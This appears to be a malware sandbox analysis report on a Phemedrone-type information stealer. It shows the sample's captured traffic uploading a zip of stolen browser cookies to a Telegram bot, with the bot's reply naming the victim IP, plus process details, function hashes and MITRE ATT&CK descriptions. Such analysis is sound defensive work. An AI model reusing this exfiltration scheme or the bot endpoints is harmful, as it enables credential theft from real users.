2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 33 36 66 61 64 34 30 33 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 2d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 3b 3c 2f 5a 47 30 dd 46 1f 01 00 00 1f 01 00 00 28 00 48 00 42 72 6f 77 73 65 72 20 44 61 74 61 2f 43 68 72 6f 6d 65 2f 43 6f 6f 6b 69 65 73 5b 44 65 66 61 75 6c 74 5d 2e 74 78 74 01 00 20 00 00 00 00 00 01 00 18 00 00 Data Ascii: ------------------------------8dd3536fad403f1Content-Disposition: form-data; name="document"; filename="[US]-8.46.123.189.zip"Content-Type: application/octet-streamPK;</ZG0F(HBrowser Data/Chrome/Cookies[Default].txt
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 56 56 62 6d 4c 54 55 56 2e 65 78 65 0a 50 49 44 3a 20 33 31 37 32 0a 43 6f 6d 6d 61 6e 64 20 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4c 71 49 48 7a 43 68 46 53 56 4e 51 48 73 49 56 64 48 62 79 6a 55 58 73 49 66 56 79 6b 4f 41 6c 42 6e 55 5a 4e 75 4b 70 59 63 53 52 59 70 43 6e 72 67 49 50 54 72 64 67 63 47 43 58 5c 53 43 42 46 4a 56 56 62 6d 4c 54 55 56 2e 65 78 65 22 20 0d 0a 0d 0a 50 72 6f 63 65 73 73 3a 20 53 43 42 46 4a 56 56 62 6d 4c 54 55 56 2e 65 78 65 0a 50 49 44 3a 20 31 38 37 36 0a 43 6f 6d 6d 61 6e 64 20 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4c 71 49 48 7a 43 68 46 53 56 4e 51 48 73 49 56 64 48 62 79 6a 55 58 73 49 66 56 79 6b 4f 41 6c 42 6e 55 Data Ascii: VVbmLTUV.exePID: 3172Command Line: "C:\Program Files (x86)\LqIHzChFSVNQHsIVdHbyjUXsIfVykOAlBnUZNuKpYcSRYpCnrgIPTrdgcGCX\SCBFJVVbmLTUV.exe" Process: SCBFJVVbmLTUV.exePID: 1876Command Line: "C:\Program Files (x86)\LqIHzChFSVNQHsIVdHbyjUXsIfVykOAlBnU
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 96 33 07 56 72 b5 c3 5b bb 32 e2 dd fb 20 f0 a4 5e 2f 48 c4 21 e9 3c 79 37 08 d8 fb 7b 17 9e 9f 24 e0 df 1e 15 ff 07 b0 bc e6 20 04 60 e3 a4 57 da e2 49 bc 7e 78 e8 cf 3f 56 c8 bf 4d d7 73 e5 dd 20 79 e7 80 7d fa 96 80 9e d4 eb 05 4f ea f5 02 02 10 f1 f7 bb df fd ae 2d ef e7 bc 5f 52 f5 df 1f 8d a5 fe fb e1 f7 bf ff 7d 92 8b 8f 3d f6 58 38 ee b4 b3 c3 c7 8e 77 24 a0 23 e5 96 27 9e f4 b3 78 82 af 13 93 02 70 14 4f ec 75 42 55 7f 93 02 b0 77 3c c9 d7 8e 15 25 00 bb c6 11 79 bd e0 49 3f d1 d8 e7 51 57 fa 59 3c e9 67 f9 a8 09 40 4f fc 09 4f f0 75 c2 93 7f 80 d4 1b 84 00 94 04 cc c5 9d 44 9f 15 7e 36 6e 73 db e1 49 3f 8b 27 00 ab e3 bf 50 ca bc 3a f1 67 fb 16 c4 5d af 02 30 cf eb 55 00 42 5a 63 04 a0 72 3c 01 28 e1 57 55 f3 95 62 4f 02 50 72 d0 c6 41 e3 34 67 Data Ascii: 3Vr[2 ^/H!<y7{$ `WI~x?VMs y}O-_R}=X8w$#'xpOuBUw<%yI?QWY<g@OOuD~6nsI?'P:g]0UBZcr<(WUbOPrA4g
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 24 f7 40 95 7f 54 01 32 e7 09 c0 99 f1 ef 2a 72 4f 82 4f f2 8f b1 a4 a0 50 9e e6 b4 a6 31 74 f6 3b 41 34 cf 7a 3b d1 38 f3 ad 51 16 fd 26 d1 3c e3 ad 84 c6 8d d3 7f 9d 18 3e 63 94 a1 45 6f 86 d9 3f 7a 3e 9c b1 e4 f1 b0 c5 a5 f1 1f 93 46 f0 41 f5 d6 df 92 2f fc f8 d1 24 06 57 3d eb e1 81 3e 03 f0 1f ce 7b 22 de 7b bc bf 5c f0 29 66 b1 f3 0e 1d 45 61 9f d4 56 ff 3d 73 72 24 f6 9f ff 5e 78 79 29 02 b0 38 06 fc fa ed bb 84 37 78 1b 70 25 00 77 1f 15 80 0f 48 00 ee 1d de 7f 78 df 52 00 7e 23 fc e7 b3 e2 2f d8 8e 68 1b 04 f6 85 20 1e de 9a 4e 78 82 ce c2 71 5f fd 91 08 b4 6f 05 ae c3 ca bc f1 e0 09 40 8b 27 f8 fa c5 93 82 96 f1 08 c0 54 f5 57 56 fb a9 02 b0 dd 71 de f1 a0 fb 68 9c f4 4a 5b 3c e9 37 48 3c 69 68 41 00 9e 7c ca 29 e1 bd f7 df 4f 02 8f 67 fa d1 22 Data Ascii: $@T2*rOOP1t;A4z;8Q&<>cEo?z>FA/$W=>{"{\)fEaV=sr$^xy)87xp%wHxR~#/h Nxq_o@'TWVqhJ[<7H<ihA\|)Og"
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 83 97 7c d8 63 bd 92 80 c8 3d 3d 0b 90 98 72 68 b5 46 02 50 b2 4f 48 f8 49 f2 29 8e fc 03 8d 93 00 6c 9c fb 56 e8 07 2b eb 3c ac ac 73 39 3b e6 b4 a1 79 d6 db 15 36 3e 7c 4e b1 5e 47 81 bb c1 0a c2 51 01 58 1c 55 b6 e8 de ec e7 b0 22 b2 85 33 7d b1 37 30 ce 7a a3 2d 9e e8 ab c3 15 71 2b 8a 0f b0 00 b4 78 d2 cf e2 89 bc f1 e2 09 bc 7e f1 a4 dc f2 a6 71 d2 2b 15 5e ac 1d 9e e4 6b 87 27 f1 fa c1 93 7c ed f0 24 5e 3f 78 f2 0f 90 73 cb 83 49 01 38 c1 38 52 af 17 3c e9 67 b1 b2 cf c3 93 7e dd d0 38 e4 e9 ae f0 a4 5e 2f 78 52 af 17 26 5a 00 8a 0f af 00 1c a5 b9 ef 23 3d 83 00 14 43 7b c7 7d 4a 78 43 70 7a 4b b0 89 79 74 23 00 db 49 40 2b 00 bb 11 81 83 16 80 9d e6 3b 92 09 40 51 27 00 7b c5 ae 1d fa e2 fd 63 e8 24 ff 72 e1 67 61 6e 10 02 d0 92 8b bc 24 f3 ca 98 Data Ascii: \|c==rhFPOHI)lV+<s9;y6>\|N^GQXU"3}70z-q+x~q+^k'\|$^?xsI88R<g~8^/xR&Z#=C{}JxCpzKyt#I@+;@Q'{c$rgan$
2025-01-15 12:34:03 UTC	145	OUT	Data Raw: 67 f9 c7 6c f9 8b e8 c5 b7 f6 ed 0b de d5 ad 3d e7 8f ba b5 33 5e 53 fe 4f f6 b5 e5 2f 2d c3 d1 e0 33 7f ab db a0 ff dc 7f 5f fe 72 5e fe 70 bc f0 9d dd da b3 4a de 69 af 29 9f 69 90 81 03 6b 88 c0 28 01 b7 23 00 4b 2e b7 0b 57 09 f8 88 97 a7 54 c9 c7 de f6 63 0c f9 c7 33 95 80 c6 eb e7 f8 54 cf 2f 96 fd 11 72 85 f5 7f fb 5f ba f5 57 fd e5 28 f8 e2 5c ad f8 43 fa 29 00 a9 cc 43 cc 0d c7 81 6b 0e 7d 69 c7 c2 1a f6 89 6b 95 84 e1 39 Data Ascii: gl=3^SO/-3_r^pJi)ik(#K.WTc3T/r_W(\C)Ck}ik9
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 53 02 90 7c e2 cd 67 59 28 00 0b 6b bf 5d fe 41 88 04 54 ce 21 ea 20 f6 0b f5 fd 7d f5 62 8f 9e 1a 47 f8 d1 b2 96 ef 02 e8 3b e7 3c 7b 99 d3 3c a7 ca 44 68 f6 af e3 36 46 de 20 f6 e6 ce 05 76 4b 00 52 39 b8 76 66 59 8f f8 a3 7d f2 a5 7d ec 05 ef ef 51 04 f2 5e 40 64 20 d0 27 c6 dc ac 79 fb 21 7f 22 c4 14 7a 88 bf 67 fd 49 b7 f6 2b ef eb 79 62 d9 2b 0a 3f fa 42 2e f3 5c f0 f1 84 8b ab c8 ab a2 4f 8c 49 26 ff 60 5f 00 ee 98 4c fa 45 32 69 b7 9b 64 d2 2f b2 2f 00 cb f3 e7 91 c8 be 8c 4c fe 41 26 ea f6 8a 65 05 20 64 b2 2f 23 93 7e 91 4c fa 45 8e b5 00 5c 94 93 49 bf 48 7c 87 60 46 2a f7 02 b3 72 63 95 60 26 01 37 68 11 7c 03 ad f8 63 1e 8e b5 00 3c 50 f6 00 c7 c8 3d 2f 00 99 3c eb d3 a3 f0 6b c9 04 60 4a 10 77 19 cb 1c 11 6e 73 e9 23 ff 00 d1 17 e5 df c1 67 Data Ascii: S\|gY(k]AT! }bG;<{<Dh6F vKR9vfY}}Q^@d 'y!"zgI+yb+?B.\OI&`_LE2id//LA&e d/#~LE\IH\|`F*rc`&7h\|c<P=/<k`Jwns#g
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: b5 12 d0 bc b8 d7 3c 01 a8 f8 6b ab 00 c9 e5 5d 7f ac 33 46 df 63 bf e6 2a 01 f7 05 e0 02 46 71 14 64 d2 14 a9 d4 5a 9e ba 77 14 6a e1 79 19 e9 67 58 81 6c cf b9 c4 cf 96 71 8c 05 20 7b b4 f2 0f e6 ff ec c3 67 2f c4 77 08 8e ef 0d 0c d4 b8 f3 83 14 8c 15 80 56 07 1e 7e 2b ed 6d c3 fb 03 11 82 5c 26 52 f6 68 be 9f 2d 62 b0 b4 99 d4 5b 85 4c fc 49 26 ea f6 8a 4c f0 2d 22 93 7a ab 90 49 bd 55 c8 e4 de 32 64 82 6e af d9 17 80 25 96 48 b9 a3 c9 be 00 2c eb 77 91 4c e6 6d 87 4c fe 41 26 f5 56 21 93 7d 19 99 d4 5b 85 4c fe 41 26 f9 e6 b1 96 48 be 79 ec 54 00 c2 be 00 dc 3e 7b 7d 04 58 aa f0 2b 79 08 c0 71 7c 94 04 60 94 80 82 fc 3b f8 cc 2f 6c 5e 0a 12 64 9f 63 e6 a6 a4 de 02 a6 84 e1 20 00 ad fa 53 06 1e 7c 46 d9 b7 50 85 60 23 fd 22 0a be 38 b6 ea 6f 94 7f c0 Data Ascii: <k]3Fc*FqdZwjygXlq {g/wV~+m\&Rh-b[LI&L-"zIU2dn%H,wLmLA&V!}[LA&HyT>{}X+yq\|`;/l^dc S\|FP`#"8o
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 5b 5a 71 4c 8b d4 8b fd 38 27 51 fe b9 07 20 f6 c0 f7 f5 29 e7 e8 2b fd 18 47 41 18 69 f3 8c b9 17 02 cf fd 1c 9b 43 cb d8 1c c6 ee 63 5c 10 80 5e 4a a2 c8 8b 2c 12 80 f6 21 0a 40 d6 d2 b6 d2 4d 90 6f 51 ca 21 03 ad f6 63 8c dc 53 04 9a 0b c8 3c 05 60 bb 0f 6b 68 a3 f4 f3 5d 7f c4 25 e6 29 e8 a2 94 73 8c e0 53 dc 29 f1 a2 c8 a3 6d 8f ff 12 6f 25 a0 eb c0 79 e3 48 b3 28 da 94 69 0a 40 45 9f b1 16 c5 9b 6b 85 38 eb 95 76 e6 c4 3c e6 c8 53 18 fa 0c e7 59 ef 3a 72 c5 7d c4 75 b4 8c ab 18 0c ef fc b3 ef 0d c0 c0 fb ff ea 3b 00 91 7c c7 5a 00 7e f7 f2 f7 56 e1 47 f5 1f 12 d0 5f 59 ee 4e 38 3e 05 20 f2 2f 11 80 df ba a4 b4 bf d7 75 3f 78 67 77 c3 b5 4f 1b 04 20 c7 80 fb 77 01 de f4 69 aa 00 79 17 e0 bf ad 55 80 bd 00 7c 41 77 bb c7 80 87 db 80 39 06 9c 3d f7 68 Data Ascii: [ZqL8'Q )+GAiCc\^J,!@MoQ!cS<`kh]%)sS)mo%yH(i@Ek8v<SY:r}u;\|Z~VG_YN8> /u?xgwO wiyU\|Aw9=h
2025-01-15 12:34:03 UTC	16355	OUT	Data Raw: 41 fc 45 f9 17 05 a0 f1 28 09 11 80 c8 38 45 1f ad c2 ce b1 ad fd 23 0f fc 60 95 78 f4 e3 91 5e 85 9e fd c3 a7 5e 35 ca 3e 62 51 16 fa cc 9a 7f df 5e fc f5 32 af 17 6f c6 e8 b7 02 50 14 80 ca 3c a0 0f 54 05 7a f4 d7 39 50 0a 1a ef f3 ca 77 50 f6 61 cf 7b 94 ef 86 d6 6a 3f 3f 47 2b 00 a7 c6 03 56 ff 21 fb e8 53 bd 17 05 a0 39 b4 88 3d a5 9f f9 31 4e 3b 1e 01 3e a9 fc 7c 41 ac 31 3e f1 fe e5 7b 2c 2d c7 6e c1 23 bb b4 40 9e d2 0e 71 48 cc 7d 5a 99 e7 b8 8d b1 1f 6b b2 f9 98 e7 67 53 1e 32 ae c2 f1 5e 65 8d b2 2f 08 40 e1 f8 ef b6 8f 00 bf e7 ca 0f 75 1f fc e0 07 bb ab ae bc b2 bb e2 8a 2b ba cb 2f bf bc 7b ff fb de df bd ef bd ef ed de f3 9e f7 74 ef 7a d7 bb ba 77 be e3 9d dd 3b de fe f6 ee 2f fe fc 2f ba ff f2 47 7f 98 0a b9 a3 cd de 08 c0 9d 31 b3 fa 0f Data Ascii: AE(8E#`x^^5>bQ^2oP<Tz9PwPa{j??G+V!S9=1N;>\|A1>{,-n#@qH}ZkgS2^e/@u+/{tzw;//G1
2025-01-15 12:34:04 UTC	1133	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 12:34:03 GMT Content-Type: application/json Content-Length: 745 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":41,"from":{"id":7105371916,"is_bot":true,"first_name":"[OUTPUT] - LOGS","username":"outputlog445_bot"},"chat":{"id":8013500311,"first_name":"\u0430\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u044b\u0439","username":"agressive_g1rl","type":"private"},"date":1736944443,"document":{"file_name":"[US]-8.46.123.189.zip","mime_type":"application/zip","file_id":"BQACAgIAAxkDAAMpZ4erO92ktnz_2KlZIAmudN_-r8MAAmNmAAIvYEFIq2idRbQ-9jc2BA","file_unique_id":"AgADY2YAAi9gQUg","file_size":733811},"caption":" - IP: 8.46.123.189 (United States)\n - Tag: labInstalls_bot \n - Passwords: 0\n - Cookies: 2 \n - Wallets: 0\n - Cookies Tags: \n - Passwords Tags:","caption_entities":[{"offset":0,"length":142,"type":"pre"}]}}

Target ID:	0
Start time:	07:33:54
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\qqnal04.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\qqnal04.exe"
Imagebase:	0x29029cc0000
File size:	125'920 bytes
MD5 hash:	B63E93F067D727C983C46012F35647D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	23.1%
Total number of Nodes:	13
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F18B68 Relevance: 2.2, Instructions: 2182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c789014dc9d5aa0a2bb311d85c4166176809c259e40bd8f84f7c3b873a782c
Instruction ID: 17e1693574d6935aa8440aa11c7560997633560f26682e0c71ab7a1c44f192ed
Opcode Fuzzy Hash: c8c789014dc9d5aa0a2bb311d85c4166176809c259e40bd8f84f7c3b873a782c
Instruction Fuzzy Hash: B7F2F96061E5C91FD315DB7894A66AEBFA1DF9B380F2988EDD08A8B1E7CC185407C742

Function 00007FF848F215F2 Relevance: 1.8, APIs: 1, Instructions: 256
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32 ref: 00007FF848F217B3

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 5ce17801aea72e9914284817985d6cbefd642eda25db589f3863675c31684e24
Instruction ID: 69ca65e3d249859bf4e4803a1d6494840177729b648b19436eba3c6857f72c70
Opcode Fuzzy Hash: 5ce17801aea72e9914284817985d6cbefd642eda25db589f3863675c31684e24
Instruction Fuzzy Hash: E681E130908A588FDB99EB18D841BE9BBF1FF59310F0042AAD44DD3292DF35A985CB85

Function 00007FF848F1BF7A Relevance: .9, Instructions: 913COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bae23300891b904432fbf8812aff65dbbb7c0ccf455a791a5091feda7abc264
Instruction ID: f60ca7ceba4dcd87f0e9968072467325756f32a2b8bbec04365c5ae2bcb34caa
Opcode Fuzzy Hash: 5bae23300891b904432fbf8812aff65dbbb7c0ccf455a791a5091feda7abc264
Instruction Fuzzy Hash: 8D52DF30A1DA4A8FE758AB289455379B7D1EF94B84F2440BDC45EC71C2EF2AEC42C785

Function 00007FF848F26A95 Relevance: .7, Instructions: 733COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1fadeb545a881bae14e998f03db9431add36dcdcdb34c25266c1a69575fe17
Instruction ID: a0377d997e0d6f3e954b00292de9006abad7d680f62901e9402d9f60ec8e2537
Opcode Fuzzy Hash: cf1fadeb545a881bae14e998f03db9431add36dcdcdb34c25266c1a69575fe17
Instruction Fuzzy Hash: C9225831A0EE8A4FE795E738A8562B97BE1EF96350F0805BED04DC71D7DF1968028345

Function 00007FF848F14DC6 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc9f2f82fe5c09c93185e1c7c87b6e37f866a6c504c4d889d80d8a5863d97fc
Instruction ID: 78b6fd14bab20b844af1d3397184fbd9547cc4c12f21478ae61905dfe5686d33
Opcode Fuzzy Hash: dcc9f2f82fe5c09c93185e1c7c87b6e37f866a6c504c4d889d80d8a5863d97fc
Instruction Fuzzy Hash: 9AF1943091CA8E8FEBA8EF28C8557E977D1FF58350F04426EE84DC7295DB34A9458B81

Function 00007FF848F15B72 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe5c274a4e69494c0c4ebc263ca95ca5af6ac09e4bac78c2095b0d03cf79951
Instruction ID: fe9b2e679887d1c9376a5e7744af47d43ce4da36e674d9a797f8ab4f4354f81a
Opcode Fuzzy Hash: 1fe5c274a4e69494c0c4ebc263ca95ca5af6ac09e4bac78c2095b0d03cf79951
Instruction Fuzzy Hash: F2E1A53090CA4E4FEBA8EF28D8557E977E1FF58350F04426ED84DC7291DB74A9448B85

Function 00007FF848F21110 Relevance: 1.8, APIs: 1, Instructions: 274
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF848F212FC

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 115e1ec0ae78642ba7313f3c8ae564cedfb99486a7d66d69fffc365b9bde760b
Instruction ID: e7a7273ac376e0a6d6cb23fb94408c3da6183f889f43347b867e814a532cdcb3
Opcode Fuzzy Hash: 115e1ec0ae78642ba7313f3c8ae564cedfb99486a7d66d69fffc365b9bde760b
Instruction Fuzzy Hash: D581C230908A4D4FEB98EF28D8597B977E1FF59340F14417AE84DC3292DF39A8818B85

Non-executed Functions

Function 00007FF848F176D0 Relevance: 4.2, Strings: 3, Instructions: 479COMMON

Download Yara Rule

Strings

(LH, xrefs: 00007FF848F1F69B
-N_L, xrefs: 00007FF848F1F770
0, xrefs: 00007FF848F1F79B

Memory Dump Source

Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd

Similarity

API ID:
String ID: (LH$-N_L$0
API String ID: 0-31394361
Opcode ID: 0fdb8585eb1403d856129f30505b5fe548b19d6dd0d488dae4463c9fb47245c9
Instruction ID: 223ee5b88e4b38324fc5466a6932bfd28af54bc0f01c7bddac351d6c6d56f72a
Opcode Fuzzy Hash: 0fdb8585eb1403d856129f30505b5fe548b19d6dd0d488dae4463c9fb47245c9
Instruction Fuzzy Hash: BCD19E31A0DA8A4FE75DEB2894555B97BD1EF96360F0445BED88AC71D3DE28AC038380

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

